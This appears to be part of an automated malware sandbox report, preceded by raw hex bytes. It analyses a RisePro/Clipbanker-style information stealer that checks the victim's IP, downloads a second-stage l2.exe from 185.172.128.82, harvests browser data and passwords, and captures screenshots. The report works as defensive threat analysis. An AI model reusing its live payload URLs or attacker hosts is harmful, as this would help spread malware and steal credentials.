b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
        Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
        Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
        Source: Joe Sandbox ViewIP Address: 104.26.4.15 104.26.4.15
        Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
        Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: unknownDNS query: name: ipinfo.io
        Source: unknownDNS query: name: ipinfo.io
        Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
        Source: global trafficHTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
        Source: global trafficHTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.82
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.82
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.82
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.136
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C8590 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,freeaddrinfo,WSACleanup,freeaddrinfo,2_2_004C8590
        Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
        Source: global trafficHTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
        Source: global trafficHTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: ipinfo.io
        Source: global trafficDNS traffic detected: DNS query: db-ip.com
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/k/l2.exe
        Source: RegSvcs.exe, 00000002.00000002.4088382278.0000000005140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/k/l2.exe-u
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/k/l2.exeR0
        Source: RegSvcs.exe, 00000002.00000002.4088382278.0000000005140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/k/l2.exe~u
        Source: MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: file.exe, 00000000.00000002.1650745382.00000000052F5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/
        Source: RegSvcs.exe, 00000002.00000002.4087862443.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.1750
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
        Source: file.exe, 00000000.00000002.1650745382.00000000052F5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175
        Source: MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://support.mozilla.org
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
        Source: JzfQ8mMmJVvXHistory.2.dr, PlAoyWlIwtSEHistory.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: JzfQ8mMmJVvXHistory.2.dr, PlAoyWlIwtSEHistory.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: JzfQ8mMmJVvXHistory.2.dr, PlAoyWlIwtSEHistory.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: JzfQ8mMmJVvXHistory.2.dr, PlAoyWlIwtSEHistory.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: 3mPJKgsigfIE_SLZsizIH3r.zip.2.drString found in binary or memory: https://t.me/RiseProSUPPORT
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.2.drString found in binary or memory: https://t.me/risepro_bot
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot%0
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botlater3.175
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://www.ecosia.org/newtab/
        Source: AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: RegSvcs.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: RegSvcs.exe, 00000002.00000002.4089027657.000000000517A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, D87fZN3R3jFeplaces.sqlite.2.dr, 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: RegSvcs.exe, 00000002.00000002.4089027657.000000000517A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/V
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/g
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/r
        Source: 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: RegSvcs.exe, 00000002.00000002.4089027657.000000000517A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
        Source: RegSvcs.exe, 00000002.00000002.4089027657.000000000517A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/XE;
        Source: RegSvcs.exe, 00000002.00000002.4088382278.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, D87fZN3R3jFeplaces.sqlite.2.dr, 3b6N2Xdh3CYwplaces.sqlite.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/refox
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E5FF0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown,2_2_004E5FF0

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 22.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 22.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 21.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 21.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
        Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
        PE file contains section with special chars
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name:
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF7B6B00_2_6CF7B6B0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFCAC290_2_6CFCAC29
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF72D700_2_6CF72D70
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA4EE00_2_6CFA4EE0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF949700_2_6CF94970
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF94AC00_2_6CF94AC0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFC0B890_2_6CFC0B89
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF58B300_2_6CF58B30
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF945500_2_6CF94550
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFCA54D0_2_6CFCA54D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF566500_2_6CF56650
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF5A7E00_2_6CF5A7E0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF5C7B00_2_6CF5C7B0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF6A0C00_2_6CF6A0C0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA63B00_2_6CFA63B0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFB23100_2_6CFB2310
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFB1CA00_2_6CFB1CA0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF93C900_2_6CF93C90
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA5DD00_2_6CFA5DD0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFC5DD20_2_6CFC5DD2
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA5EB90_2_6CFA5EB9
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF93E500_2_6CF93E50
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFC9FFC0_2_6CFC9FFC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFCBFF10_2_6CFCBFF1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA58D70_2_6CFA58D7
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA58D50_2_6CFA58D5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA58300_2_6CFA5830
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFCB9640_2_6CFCB964
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFC9AAB0_2_6CFC9AAB
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF934600_2_6CF93460
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA50500_2_6CFA5050
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFA52740_2_6CFA5274
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF932600_2_6CF93260
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_033962C60_2_033962C6
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_033931F00_2_033931F0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03390A500_2_03390A50
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03390E080_2_03390E08
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_033970300_2_03397030
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_062B0EB30_2_062B0EB3
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_062B26F80_2_062B26F8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_062B26DD0_2_062B26DD
